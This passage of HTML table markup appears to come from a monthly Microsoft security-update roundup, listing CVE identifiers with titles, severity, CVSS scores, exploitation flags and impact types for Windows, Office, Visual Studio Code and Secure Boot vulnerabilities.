  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45471"><span>CVE-2026-45471</span></a></td>
  <td width="256" class="xl68">Microsoft Word Remote
  Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45486"><span>CVE-2026-45486</span></a></td>
  <td width="256" class="xl68">Microsoft Word Remote
  Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45643"><span>CVE-2026-45643</span></a></td>
  <td width="256" class="xl68">Microsoft Word Remote
  Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45457"><span>CVE-2026-45457</span></a></td>
  <td width="256" class="xl68">Microsoft Word Remote
  Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42980"><span>CVE-2026-42980</span></a></td>
  <td width="256" class="xl68">NT OS Kernel Elevation
  of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">1</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42916"><span>CVE-2026-42916</span></a></td>
  <td width="256" class="xl68">NT OS Kernel Elevation
  of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45649"><span>CVE-2026-45649</span></a></td>
  <td width="256" class="xl68">Office for Android
  Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.1</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47653"><span>CVE-2026-47653</span></a></td>
  <td width="256" class="xl68">Remote Desktop Client
  Remote Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">8.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42909"><span>CVE-2026-42909</span></a></td>
  <td width="256" class="xl68">Remote Desktop Client
  Remote Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42913"><span>CVE-2026-42913</span></a></td>
  <td width="256" class="xl68">Remote Desktop Client
  Remote Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42993"><span>CVE-2026-42993</span></a></td>
  <td width="256" class="xl68">Remote Desktop Client
  Remote Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45588"><span>CVE-2026-45588</span></a></td>
  <td width="256" class="xl68">Secure Boot Security
  Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.9</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48568"><span>CVE-2026-48568</span></a></td>
  <td width="256" class="xl68">Secure Boot Security
  Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.9</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48570"><span>CVE-2026-48570</span></a></td>
  <td width="256" class="xl68">Secure Boot Security
  Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.9</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48573"><span>CVE-2026-48573</span></a></td>
  <td width="256" class="xl68">Secure Boot Security
  Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.9</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48575"><span>CVE-2026-48575</span></a></td>
  <td width="256" class="xl68">Secure Boot Security
  Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.9</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48576"><span>CVE-2026-48576</span></a></td>
  <td width="256" class="xl68">Secure Boot Security
  Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.9</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48578"><span>CVE-2026-48578</span></a></td>
  <td width="256" class="xl68">Secure Boot Security
  Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.9</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45654"><span>CVE-2026-45654</span></a></td>
  <td width="256" class="xl68">Secure Boot Security
  Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.9</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45656"><span>CVE-2026-45656</span></a></td>
  <td width="256" class="xl68">UEFI Secure Boot
  Security Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-8863"><span>CVE-2026-8863</span></a></td>
  <td width="256" class="xl68">UEFI Secure Boot
  Security Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-40376"><span>CVE-2026-40376</span></a></td>
  <td width="256" class="xl68">Visual Studio Code
  Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47281"><span>CVE-2026-47281</span></a></td>
  <td width="256" class="xl68">Visual Studio Code
  Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">9.6</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47284"><span>CVE-2026-47284</span></a></td>
  <td width="256" class="xl68">Visual Studio Code
  Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">6.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47292"><span>CVE-2026-47292</span></a></td>
  <td width="256" class="xl68">Visual Studio Code
  MSSQL Extension Remote Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48569"><span>CVE-2026-48569</span></a></td>
  <td width="256" class="xl68">Visual Studio Code
  Security Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.1</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47287"><span>CVE-2026-47287</span></a></td>
  <td width="256" class="xl68">Visual Studio Code
  Tampering Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">6.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Tampering</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42829"><span>CVE-2026-42829</span></a></td>
  <td width="256" class="xl68">Windows Administrator
  Protection Secure Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-34335"><span>CVE-2026-34335</span></a></td>
  <td width="256" class="xl68">Windows Ancillary
  Function Driver for WinSock Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45601"><span>CVE-2026-45601</span></a></td>
  <td width="256" class="xl68">Windows Ancillary
  Function Driver for WinSock Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45598"><span>CVE-2026-45598</span></a></td>
  <td width="256" class="xl68">Windows Ancillary
  Function Driver for WinSock Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45596"><span>CVE-2026-45596</span></a></td>
  <td width="256" class="xl68">Windows Ancillary
  Function Driver for WinSock Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45638"><span>CVE-2026-45638</span></a></td>
  <td width="256" class="xl68">Windows Ancillary
  Function Driver for WinSock Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45603"><span>CVE-2026-45603</span></a></td>
  <td width="256" class="xl68">Windows Ancillary
  Function Driver for WinSock Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42911"><span>CVE-2026-42911</span></a></td>
  <td width="256" class="xl68">Windows Ancillary
  Function Driver for WinSock Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45594"><span>CVE-2026-45594</span></a></td>
  <td width="256" class="xl68">Windows Application
  Identity (AppID) Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45655"><span>CVE-2026-45655</span></a></td>
  <td width="256" class="xl68">Windows BitLocker
  Security Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.3</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45658"><span>CVE-2026-45658</span></a></td>
  <td width="256" class="xl68">Windows BitLocker
  Security Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">1</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45640"><span>CVE-2026-45640</span></a></td>
  <td width="256" class="xl68">Windows Bluetooth Port
  Driver Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45605"><span>CVE-2026-45605</span></a></td>
  <td width="256" class="xl68">Windows Bluetooth
  Service Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47656"><span>CVE-2026-47656</span></a></td>
  <td width="256" class="xl68">Windows Boot Manager
  Security Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.9</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44809"><span>CVE-2026-44809</span></a></td>
  <td width="256" class="xl68">Windows Common Log
  File System Driver Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45634"><span>CVE-2026-45634</span></a></td>
  <td width="256" class="xl68">Windows DHCP Client
  Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45608"><span>CVE-2026-45608</span></a></td>
  <td width="256" class="xl68">Windows DHCP Client
  Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">6.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-41108"><span>CVE-2026-41108</span></a></td>
  <td width="256" class="xl68">Windows DNS Client
  Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42905"><span>CVE-2026-42905</span></a></td>
  <td width="256" class="xl68">Windows DWM Core
  Library Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">1</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44811"><span>CVE-2026-44811</span></a></td>
  <td width="256" class="xl68">Windows DWM Core
  Library Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44808"><span>CVE-2026-44808</span></a></td>
  <td width="256" class="xl68">Windows DWM Core
  Library Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44807"><span>CVE-2026-44807</span></a></td>
  <td width="256" class="xl68">Windows DWM Core
  Library Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42983"><span>CVE-2026-42983</span></a></td>
  <td width="256" class="xl68">Windows DWM Core
  Library Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44802"><span>CVE-2026-44802</span></a></td>
  <td width="256" class="xl68">Windows DWM Core
  Library Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44813"><span>CVE-2026-44813</span></a></td>
  <td width="256" class="xl68">Windows DWM Core
  Library Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44804"><span>CVE-2026-44804</span></a></td>
  <td width="256" class="xl68">Windows DWM Core
  Library Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48566"><span>CVE-2026-48566</span></a></td>
  <td width="256" class="xl68">Windows DWM Core
  Library Information Disclosure<span> 
  </span>Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44814"><span>CVE-2026-44814</span></a></td>
  <td width="256" class="xl68">Windows DWM Core
  Library Information Disclosure<span> 
  </span>Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45602"><span>CVE-2026-45602</span></a></td>
  <td width="256" class="xl68">Windows Dynamic Host
  Configuration Protocol (DHCP) Tampering Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">9.1</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Tampering</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42836"><span>CVE-2026-42836</span></a></td>
  <td width="256" class="xl68">Windows Function
  Discovery Service (fdwsd.dll) Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42910"><span>CVE-2026-42910</span></a></td>
  <td width="256" class="xl68">Windows Hotpatch
  Monitoring Service Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42972"><span>CVE-2026-42972</span></a></td>
  <td width="256" class="xl68">Windows Hyper-V
  Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45592"><span>CVE-2026-45592</span></a></td>
  <td width="256" class="xl68">Windows Internet
  (wininet.dll) Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42903"><span>CVE-2026-42903</span></a></td>
  <td width="256" class="xl68">Windows Kerberos
  Denial of Service Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">6.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">DoS</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42914"><span>CVE-2026-42914</span></a></td>
  <td width="256" class="xl68">Windows Kerberos
  Denial of Service Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.3</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">DoS</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48583"><span>CVE-2026-48583</span></a></td>
  <td width="256" class="xl68">Windows Kernel
  Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45653"><span>CVE-2026-45653</span></a></td>
  <td width="256" class="xl68">Windows Kernel
  Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42984"><span>CVE-2026-42984</span></a></td>
  <td width="256" class="xl68">Windows Kernel
  Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45600"><span>CVE-2026-45600</span></a></td>
  <td width="256" class="xl68">Windows Kernel-Mode
  Driver Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45604"><span>CVE-2026-45604</span></a></td>
  <td width="256" class="xl68">Windows Managed
  Installer Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45595"><span>CVE-2026-45595</span></a></td>
  <td width="256" class="xl68">Windows Mark of the
  Web Security Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45636"><span>CVE-2026-45636</span></a></td>
  <td width="256" class="xl68">Windows NTFS Remote
  Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
